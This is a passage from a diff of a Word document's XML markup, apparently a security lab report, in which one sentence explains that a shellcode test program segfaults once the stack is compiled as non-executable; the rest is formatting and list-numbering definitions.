+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="TextBody"/>
+        <w:spacing w:before="0" w:after="140"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t xml:space="preserve">he above screenshot also shows the results from running call_shellcode. The output results in a segmentation fault. This error is caused by disallowing the stack to be executable. The flag -z noexecstack prevents the stack from being executable and since we recompiled the program with this flag, it can no longer run as it ran shell code within the stack. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -4528,6 +7855,244 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="none"/>
+      <w:suff w:val="nothing"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="start"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="0"/>
+        </w:tabs>
+        <w:ind w:start="0" w:hanging="0"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
     <w:abstractNumId w:val="1"/>
   </w:num>
@@ -4536,6 +8101,12 @@
   </w:num>
   <w:num w:numId="3">
     <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="5"/>
   </w:num>
 </w:numbering>
 </file>
